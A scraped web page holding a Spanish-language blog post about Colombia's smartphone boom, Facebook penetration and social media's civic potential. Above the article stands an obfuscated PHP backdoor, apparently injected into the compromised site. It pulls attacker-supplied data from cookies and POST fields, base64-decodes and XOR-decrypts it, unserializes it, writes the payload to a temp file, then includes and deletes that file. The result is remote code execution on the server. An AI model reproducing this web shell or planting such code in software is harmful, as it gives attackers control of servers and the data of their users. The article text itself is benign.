$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Cuando la tecnología es más que Facebook – www.interferencechannel.com

Cuando la tecnología es más que Facebook

Juan Sebastian Duque

Juan Sebastian Duque

Colombia hoy en día está en la mira del mundo, y la están siguiendo con gran interés distintos países, inversionistas y emprendedores tecnológicos de alrededor del mundo. Ni más faltaba, los indicios que muestra Colombia, o simplemente el contraste que representa con respecto a sus vecinos cercanos, hacen brillar al país, a veces más que por su propio brillo. El mundo entero comienza a voltearse hacia una región del globo llamada Latinoamérica, en donde si bien existen fronteras geográficas y de retraso en infraestructura gigantes, la lengua no se presenta como una barrera más para el crecimiento regional.

Uno de los indicadores que más impresiona, es el crecimiento de Smartphones des país.
53e8fc6c6a334f696238e860c3261ebf
Fuimos para el periodo de enero de 2012 a enero de 2013 el país de mayor crecimiento a nivel mundial. 278% (http://blog.flurry.com/bid/94352/China-Knocks-Off-U-S-to-Become-Top-Smartphone-Tablet-Market) de crecimiento anual representa un aumento mayor que el de los gigantes como China e India, mostrando un vuelco de Colombia hacia el mundo tecnológico, y empieza a dar signos de un país que se va modernizando. El análisis es simple, más Smartphones, mayor conectividad por parte de los colombianos, aunque estas cifras siempre hay que tomarlas con pinzas, ya que no todo es lo que parece.
Por otro lado, tenemos reportes que muestran una Colombia hiperconectada, pero más que al mundo exterior, a las redes sociales. Somos el país número 14 con más usuarios de Facebook (http://www.seocolombia.com/blog/estadisticas-facebook-colombia-2012/) con más de 15 millones de habitantes intercambiando su estatus por medio de esta red. Además, Bogotá con 6 millones y medio de usuarios representa la ciudad 9 mundial conectada a la red social, con una penetración del 86%.
Y todo esto para qué? ¿Esta información de qué nos sirve? Colombia está dando pasos agigantados hacia el mundo de la tecnología, queremos salir de ese retroceso tecnológico permanente y lo estamos haciendo a nuestra manera, siguiendo nuestra idiosincrasia latina de querer saber todo sobre todos, y poder opinar en permanencia sobre la vida de los demás; y qué mejor manera de hacerlo que a través de las conversaciones de comadres y de chismes, lugares de encuentro como peluquerías y salas de espera pasadas al medio web llamadas Facebook, Twitter, Instagram o cualquiera de las opciones. Cualquiera podría decir que no es gran cosa, pero puede que sea el primer paso que genere toda una revolución que está por venir.
Hoy en día, gracias a lo anterior y las facilidades tecnológicas, el mundo de la información, está llegando a la velocidad de las redes sociales a una mayor cantidad de colombianos. Las redes sociales se presentan como la alternativa para un despertar hacia diferentes realidades de la situación del país y del mundo, las preocupaciones de fondo del país y las necesidades de cambio. En Estados Unidos ya se eligió un presidente gracias a campañas bien dirigidas en medios web, y en Colombia grupos independientes como el Partido del Tomate han logrado hacer llegar su mensaje a gente que sin las tecnologías de hoy en día habrían sido iniciativas conocidas por sus fundadores y su madres. Además, estamos presenciando la aparición de medios independientes creados desde las salas de las casas de algunos inconformes con los medios tradicionales que han llevado a una “democratización” de la información, dando cabida hasta a la sátira política que con no más de unos cuantos pesos y muchos esfuerzo y sudor se han dado a conocer y se han convertido en fuente de referencias en los discursos acalorados en nuestros muros cada día.
Pero apenas estamos espesando. Ahora toca que comencemos a conectarnos más allá que para mostrar nuestros menús, las fotos de nuestras vacaciones, u opinar basados en artículos de dudosa fuente, y tendremos que dar un vuelco a una Colombia 2.0 que pase de utilizar los medios para quejarnos en permanencia a utilizar las nuevas tecnologías para convertirnos en la potencia que todos los que tienen los ojos sobre nosotros esperan que seamos. La crítica siempre será buena como contrapeso a nuestros dirigentes actuales, pero toca que empecemos a construir para dar las bases para una Colombia futura. Pero, dados los resultados de las pruebas PISA, será que podremos utilizar esos computadores portátiles llamados celulares para otra cosa que no sea el simple morbo colombiano?♦

Comments are closed.